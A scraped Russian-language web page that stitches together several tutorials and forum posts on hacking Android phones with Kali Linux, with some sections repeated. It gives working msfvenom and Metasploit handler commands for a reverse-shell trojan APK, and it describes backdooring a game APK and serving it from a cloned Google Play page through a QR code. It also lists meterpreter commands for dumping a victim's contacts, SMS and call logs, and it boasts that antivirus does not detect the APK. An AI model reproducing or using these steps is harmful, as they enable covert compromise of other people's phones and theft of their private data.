Kali linux взлом андроид

Краткое руководство: Как взломать андроид с Kali Linux

Главное меню » Операционная система Linux » Краткое руководство: Как взломать андроид с Kali Linux

Предпосылки для взлома Android

  1. Kali Linux
  2. Android телефон: Для демонстрационных целей использовался Android emulator предоставленный Google.

Шаги для взлома Android

1. Создать Payload

Чтобы создать троян для взлома Android, нам нужно создать полезную нагрузку, используя утилиту msfvenom в Kali Linux.

В приведенной выше команды LHOST задан IP, используется в команде ifconfig от Kali Linux.

Вышеуказанная команда создает троянский файл apk, который будет установлен на целевой телефон для использования, однако перед этим мы должны подписать этот apk для правильной установки. Следуйте шагам ниже по списку для этого.

а. Создание хранилища ключей:

Выше команда спрашивает вопросы и пароль.

б. Подписать созданный файл с помощью jarsigner apk.

с. Проверьте apk, созданный с помощью jarsigner.

д. Оптимизация файла с помощью zipalign apk.

Перед тем как начать работу, установите zipalign с помощью команды ниже:

Теперь позвольте оптимизировать apk.

Таким образом, наш окончательный apk, который мы используем для взлома андроида назван как «my0704_sign.apk».

2. Запустите msfconsole на Kali Linux для эксплуатации телефона Android.

В приведенной выше строке msf запустить полезную нагрузку на андроид и мультиобработчик команд exploit с помощью ниже:

В команде ниже мы используем IP Kali Linux, может быть взят с помощью команды ifconfig на Kali Linux. Кроме того, мы используем номер порта 4444 для эксплуатации.

А затем, наконец, использовать команду, которая будет ждать исполнения apk на телефоне Android.

Выполнение apk на андроиде.

Здесь мы используем Android эмулятор предоставленный Google. Следовательно , вам необходимо загрузить образ ISO с сайта Google.

После загрузки вы можете создать нормальную виртуальную машину VMware и смонтировать этот ISO на виртуальной машине, чтобы запустить виртуальную машину машину. Настройка Android VM с помощью id gmail.

Если вы нашли ошибку, пожалуйста, выделите фрагмент текста и нажмите Ctrl+Enter.

Источник

Краткое руководство: Как взломать андроид с Kali Linux

Предпосылки для взлома Android

Шаги для взлома Android

1. Создать Payload

Чтобы создать троян для взлома Android, нам нужно создать полезную нагрузку, используя утилиту msfvenom в Kali Linux.

В приведенной выше команды LHOST задан IP, используется в команде ifconfig от Kali Linux.

Вышеуказанная команда создает троянский файл apk, который будет установлен на целевой телефон для использования, однако перед этим мы должны подписать этот apk для правильной установки. Следуйте шагам ниже по списку для этого.

а. Создание хранилища ключей:

Выше команда спрашивает вопросы и пароль.

б. Подписать созданный файл с помощью jarsigner apk.

с. Проверьте apk, созданный с помощью jarsigner.

д. Оптимизация файла с помощью zipalign apk.

Перед тем как начать работу, установите zipalign с помощью команды ниже:

Читайте также:  Сделать слайд шоу линукс

Теперь позвольте оптимизировать apk.

Таким образом, наш окончательный apk, который мы используем для взлома андроида назван как «my0704_sign.apk».

2. Запустите msfconsole на Kali Linux для эксплуатации телефона Android.

В приведенной выше строке msf запустить полезную нагрузку на андроид и мультиобработчик команд exploit с помощью ниже:

В команде ниже мы используем IP Kali Linux, может быть взят с помощью команды ifconfig на Kali Linux. Кроме того, мы используем номер порта 4444 для эксплуатации.

А затем, наконец, использовать команду, которая будет ждать исполнения apk на телефоне Android.

Выполнение apk на андроиде.

Здесь мы используем Android эмулятор предоставленный Google. Следовательно , вам необходимо загрузить образ ISO с сайта Google.

После загрузки вы можете создать нормальную виртуальную машину VMware и смонтировать этот ISO на виртуальной машине, чтобы запустить виртуальную машину машину. Настройка Android VM с помощью id gmail.

Источник

Статья Взлом Android — устройства. (Backdoor-apk + HTA server)

Всем привет! В этой теме я хочу показать еще один способ взлома Android – устройства, на мой взгляд, не сложный, но действенный. Использовать будем QR-код, HTA – сервер и естественно Kali Linux.

Для начала нам потребуется софт, для того, чтобы поместить полезную нагрузку в APK – файл. Мы будем использовать Backdoor-apk, скачаем его с Github командой:

Затем установим все необходимые библиотеки.

> apt-get install lib32stdc++6 lib32ncurses5 lib32z1


Теперь нам понадобится приложение, в которое мы будем «вшивать» полезную нагрузку, для этого перейдем на сайт apk4fun.com и выберем понравившееся. Сразу оговорюсь, что я перепробовал порядка ста приложений, но большинство из них не компилировалось, при попытке записать нагрузку в него. Еще какая-то часть работала с ошибками. Так же я сталкивался с проблемой, когда сессия отваливались по прошествии 30 – 50 сек после открытия. А именно, когда телефон уходил в ждущий режим и гас экран.

Был интересный момент c Viber, пару раз мне удавалось «вызвать» сессию тогда когда мне было нужно, просто написав сообщение жертве. Но потом эксперимент провалился, приложение перестало работать от слова совсем.

Итак, после нескольких часов тестов я остановился на игре 2048. Как это ни забавно, но именно она работала стабильнее всего, и сессия meterpreter работала корректно.

Качаем именно эту версию, так как другие я просто не пробовал:

Затем скопируем файл в папку с установленным Backdoor-apk.

Теперь, выполняя по очереди следующие команды, создадим файл с полезной нагрузкой:

> ./backdoor-apk.sh com.digiplex.game-2.7.2.apk (я сократил ему имя)

Выбираем параметры соответствующие нашим требованиям, я провожу эксперимент в пределах своей локальной сети.

Этот процесс сгенерирует готовый файл в директорию, в моем случае, /root/backdoor-apk/backdoor-apk/original/dist


На этом пока остановимся.

Пришло время запустить SET — Social Engineering Toolkit – набор инструментов для социальной инженерии. Вектор выбранной атаки – это клонирование сайта Google Play и скачивания игры 2048 именно с нашего, клонированного сайта. Дальнейшие действия не должны выходить за рамки приведенной ниже инструкции. Запускаем SET:

Выберем Website Attack Vectors.

Нас интересует HTA – Attack Method.

Следующий выбранный пункт – это ввод адреса сайта, который мы склонируем. Базироваться он будет нашей локальной сети, и единственная его цель, это доставить игру с полезной нагрузкой на смартфон цели. Так как по легенде это игра, то клонируем Google Market.

> https://play.google.com/store

Читайте также:  Windows 10 ltsc windows hello


Опции, которые будет запрашивать SET вы можете вводить такие же, как и при создании .apk файла. В моем случае 192.168.0.101 и порт 4444. Позже мы все изменим. Терминал с запущенным SET не закрываем.
Итак, Apache работает, ложный сайт склонирован. Если зайдем на адрес 192.168.0.101 с любого компьютера в нашей сети, то в случае успеха, попадем на фэйковый Google Play.

Теперь необходимо инициировать скачивание файла с нашей игрой сразу после перехода на сайт, для этого выполним следующие действия:

· Копируем файл с полезной нагрузкой в директорию /var/www/html (На Kali Linux машине)

· В файле index.html меняем указанную строку. Впишем туда название файла с игрой, но предварительно переименуем ее в Launcher.apk (Ctrl+F поиск по файлу)

Теперь, зайдя на страницу по адресу 192.168.0.101, мы не просто попадаем на ложный Google Play, но и скачиваем автоматически нашу игру 2048 переименованную в Launcher.apk.

Теперь мы оптимизируем процесс установки нашего приложения на целевое устройство.

Для начала установим расширение The QR Code Extension в наш браузер. Я использую Google Chrome.

На целевом устройстве должно присутствовать приложение для считывания QR – кодов, например, QR – Code Reader:

Перейдем на наш фейковый сайт Google Play и сгенерируем QR – код ссылку на него.

Просканировав QR – код с нашего целевого устройства мы скачиваем наш файл с полезной нагрузкой.

Для получения сессии meterpreter, заранее запустим на исполнение файл backdoor-apk.rc командой:

И затем, запустим игру.

В консоли получаем активную сессию meterpreter.

Источник

Взлом любого Android устройства на Kali Linux 2.0

Roanis

Roanis

Roanis

Как это происходит?
Мы создаем апк файл на кали и делаем так, чтобы жертва его скачала (ну это здесь описывать не буду, есть гугл). А далле после того как жертва его установит мы получаем доступ к контактам, смс, к терминалу и всем функциям удаленно, в том числе можно делать снимки с камер как с фронтальной, так и с задней.

Итак прежде всего нам нужно знать, локальный хост (хост компа\ноута) с которого мы управлять телефоном
Можно создать апк на одном компе а управлять телефоном с другого, ну это на ваше усмотрение, кому как удобно (главное чтобы на всех был Кали 2.0)

Прописываем в консоли ifconfig и узнаем в wlan0 или eth0 (если вы с вйфйя то wlan0 если с прямого подключения то eth0) наш айпи в локальной сети
В моем случае это будет 192.168.1.117

Дальше зная это мы прописываем:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.117 LPORT=4444 R >filename.apk

В домашней директории создастся файл filename.apk который потом установит жервта.

Далее заходим в msfconsole , просто прописывая это в терминале

Дожидаемся и пишем use exploit/multi/handler

Дальше ставим пейлоад set payload android/meterpreter/reverse_tcp
Потом ставим порт set LPORT 4444
так же ставим хост set LHOST 192.168.1.117

Далее запускаем експлойт командой exploit -j -z

Остается теперь сделать так, чтобы человек скачал и установил апк
Когда он это сделает, главное чтобы он оставался в сети через вай фай
Если он отключится то сессия не будет доступна

Читайте также:  Расширение isz чем открыть windows 10

И еще кое-что
апк не палится вообще, если конечно же не стоит какой то антивирус (у большинства не стоит ничего)

Итак когда он все это сделал у нас в консоли появляется сессия под номером 1

Прописываем sessions -i 1
Этой командой выбираем 1 сессию

И у нас запускается meterpreter

Чтобы просмортеть команды и функции, которые мы можем исполнять на чужом телефоне пропишите help

Ну а я расскажу парочку
можно дампить список контактов командой dump_contacts
можно дампить смс dump_sms
можно дампить историю звонков dump_calllog

И это только малость
Опытный юзер андроида может даже зайти с консоли в рекавери и стереть все данные или сбросить заводские настройки, или закинуть ратник чтобы следить за жертвой вне локальной сети.
На этом все)

ropepop

ropepop

ropepop

Как это происходит?
Мы создаем апк файл на кали и делаем так, чтобы жертва его скачала (ну это здесь описывать не буду, есть гугл). А далле после того как жертва его установит мы получаем доступ к контактам, смс, к терминалу и всем функциям удаленно, в том числе можно делать снимки с камер как с фронтальной, так и с задней.

Итак прежде всего нам нужно знать, локальный хост (хост компа\ноута) с которого мы управлять телефоном
Можно создать апк на одном компе а управлять телефоном с другого, ну это на ваше усмотрение, кому как удобно (главное чтобы на всех был Кали 2.0)

Прописываем в консоли ifconfig и узнаем в wlan0 или eth0 (если вы с вйфйя то wlan0 если с прямого подключения то eth0) наш айпи в локальной сети
В моем случае это будет 192.168.1.117

Дальше зная это мы прописываем:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.117 LPORT=4444 R >filename.apk

В домашней директории создастся файл filename.apk который потом установит жервта.

Далее заходим в msfconsole , просто прописывая это в терминале

Дожидаемся и пишем use exploit/multi/handler

Дальше ставим пейлоад set payload android/meterpreter/reverse_tcp
Потом ставим порт set LPORT 4444
так же ставим хост set LHOST 192.168.1.117

Далее запускаем експлойт командой exploit -j -z

Остается теперь сделать так, чтобы человек скачал и установил апк
Когда он это сделает, главное чтобы он оставался в сети через вай фай
Если он отключится то сессия не будет доступна

И еще кое-что
апк не палится вообще, если конечно же не стоит какой то антивирус (у большинства не стоит ничего)

Итак когда он все это сделал у нас в консоли появляется сессия под номером 1

Прописываем sessions -i 1
Этой командой выбираем 1 сессию

И у нас запускается meterpreter

Чтобы просмортеть команды и функции, которые мы можем исполнять на чужом телефоне пропишите help

Ну а я расскажу парочку
можно дампить список контактов командой dump_contacts
можно дампить смс dump_sms
можно дампить историю звонков dump_calllog

И это только малость
Опытный юзер андроида может даже зайти с консоли в рекавери и стереть все данные или сбросить заводские настройки, или закинуть ратник чтобы следить за жертвой вне локальной сети.
На этом все, можно репу)

Источник

Оцените статью